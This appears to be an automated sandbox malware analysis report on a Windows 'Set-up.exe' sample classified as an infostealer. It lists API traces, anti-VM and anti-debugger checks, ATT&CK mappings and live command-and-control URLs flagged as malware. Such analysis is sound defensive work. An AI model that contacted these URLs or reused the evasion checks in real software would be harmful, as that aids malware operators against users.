Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 006C7120 appears 44 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00554FD0 appears 135 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 006ECA40 appears 79 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 006C7220 appears 662 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00554F40 appears 181 times

Source: Set-up.exe

Static PE information: invalid certificate

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal72.troj.spyw.evad.winEXE@1/0@6/2

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_0052D090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,

0_2_0052D090

Source: C:\Users\user\Desktop\Set-up.exe

0_2_0051255D

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_005129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,

0_2_005129FF

Source: C:\Users\user\Desktop\Set-up.exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Set-up.exe

Virustotal: Detection: 31%

Source: Set-up.exe	String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: in-addr.arpa
Source: Set-up.exe	String found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
Source: Set-up.exe	String found in binary or memory: in-addr.arpa
Source: Set-up.exe	String found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 7793288 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4b1c00
Source: Set-up.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x12e200
Source: Set-up.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x151c00

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_005114E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_005114E0

Source: Set-up.exe

Static PE information: section name: .eh_fram

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01431354 pushfd ; retf	0_3_01431355
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01431354 pushfd ; retf	0_3_01431355
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01431354 pushfd ; retf	0_3_01431355
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01431354 pushfd ; retf	0_3_01431355
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01431354 pushfd ; retf	0_3_01431355
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142385A push ebx; iretd	0_3_0142385C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01428765 push edx; retf 0020h	0_3_01428782
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01428765 push edx; retf 0020h	0_3_01428782
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01428765 push edx; retf 0020h	0_3_01428782
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01428765 push edx; retf 0020h	0_3_01428782
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142AF75 push edi; retf	0_3_0142AF9A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142AF75 push edi; retf	0_3_0142AF9A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142AF75 push edi; retf	0_3_0142AF9A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142AF75 push edi; retf	0_3_0142AF9A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142AF75 push edi; retf	0_3_0142AF9A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142B718 push esp; retf 0020h	0_3_0142B792
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142B718 push esp; retf 0020h	0_3_0142B792
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142B718 push esp; retf 0020h	0_3_0142B792
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142B718 push esp; retf 0020h	0_3_0142B792
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142B718 push esp; retf 0020h	0_3_0142B792
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142CEFB push ss; iretd	0_3_0142CEBA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142CEFB push ss; iretd	0_3_0142CEBA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142CEFB push ss; iretd	0_3_0142CEBA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142CEFB push ss; iretd	0_3_0142CEBA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142CEFB push ss; iretd	0_3_0142CEBA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142B795 push esp; iretd	0_3_0142B7BA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142B795 push esp; iretd	0_3_0142B7BA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142B795 push esp; iretd	0_3_0142B7BA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142B795 push esp; iretd	0_3_0142B7BA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142B795 push esp; iretd	0_3_0142B7BA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0142CEB1 push ss; iretd	0_3_0142CEBA

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\Set-up.exe

Code function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second

0_2_005129FF

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Set-up.exe	Binary or memory string: PROCMON.EXE
Source: Set-up.exe	Binary or memory string: X64DBG.EXE
Source: Set-up.exe	Binary or memory string: WINDBG.EXE
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Set-up.exe	Binary or memory string: WIRESHARK.EXE

Source: C:\Users\user\Desktop\Set-up.exe

0_2_005129FF

Source: C:\Users\user\Desktop\Set-up.exe

API coverage: 7.9 %

Source: C:\Users\user\Desktop\Set-up.exe TID: 3760

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0051255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,	0_2_0051255D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,	0_2_005129FF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006EE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,	0_2_006EE270

Source: C:\Users\user\Desktop\Set-up.exe

0_2_0051255D

Source: C:\Users\user\Desktop\Set-up.exe

0_2_0051255D

Source: Set-up.exe, 00000000.00000003.1676246691.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: Set-up.exe	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Set-up.exe, 00000000.00000003.1854020138.0000000001426000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1856332412.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854245792.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854386736.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853869075.000000000141C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: Set-up.exe	Binary or memory string: Hyper-V RAW
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000000.00000003.1676579286.00000000012F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}

Source: C:\Users\user\Desktop\Set-up.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

0_2_005129FF

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_005114E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_005114E0

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0051116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	0_2_0051116C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00511160 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,	0_2_00511160
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005111A3 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,	0_2_005111A3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005113C9 SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,	0_2_005113C9

Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_006F93D0 GetSystemTime,SystemTimeToFileTime,

0_2_006F93D0

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_009B8E70 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,

0_2_009B8E70

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Set-up.exe, Set-up.exe, 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: procmon.exe
Source: Set-up.exe, Set-up.exe, 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 34.147.147.173:80

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0054A550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,	0_2_0054A550
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005DAA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,	0_2_005DAA30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0055E480 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,	0_2_0055E480

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	17 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Set-up.exe	32%	Virustotal		Browse

Source	Detection	Scanner	Label
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435	100%	Avira URL Cloud	malware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo17356394355a1	100%	Avira URL Cloud	malware
http://home.eleventj11vt.top/olN	100%	Avira URL Cloud	malware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435http://home.eleventj11vt.top/olN	100%	Avira URL Cloud	malware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435::3	100%	Avira URL Cloud	malware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=	100%	Avira URL Cloud	malware
https://httpbin.org/ipI	0%	Avira URL Cloud	safe
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdR435	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.eleventj11vt.top	34.147.147.173	true	false		high
httpbin.org	34.200.57.114	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435	true	Avira URL Cloud: malware	unknown
https://httpbin.org/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	Set-up.exe	false		high
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo17356394355a1	Set-up.exe, 00000000.00000003.1854020138.0000000001426000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1856332412.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854245792.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854386736.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853869075.000000000141C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://html4/loose.dtd	Set-up.exe	false		high
https://httpbin.org/ipbefore	Set-up.exe	false		high
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435http://home.eleventj11vt.top/olN	Set-up.exe, 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
https://curl.se/docs/http-cookies.html	Set-up.exe	false		high
https://curl.se/docs/hsts.html#	Set-up.exe	false		high
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435::3	Set-up.exe, 00000000.00000003.1854020138.0000000001426000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1856332412.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854245792.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854386736.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853869075.000000000141C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://home.eleventj11vt.top/olN	Set-up.exe, 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=	Set-up.exe, 00000000.00000002.1856204201.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854768134.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855090533.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853946639.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://httpbin.org/ipI	Set-up.exe, 00000000.00000003.1676246691.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html	Set-up.exe	false		high
http://.css	Set-up.exe	false		high
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdR435	Set-up.exe	false	Avira URL Cloud: malware	unknown
http://.jpg	Set-up.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.147.147.173	home.eleventj11vt.top	United States		2686	ATGS-MMD-ASUS	false
34.200.57.114	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582848
Start date and time:	2024-12-31 16:41:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal72.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 79% Number of executed functions: 47 Number of non-executed functions: 152
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:42:28	API Interceptor	3x Sleep call for process: Set-up.exe modified

Joe Sandbox View / Context

IPs

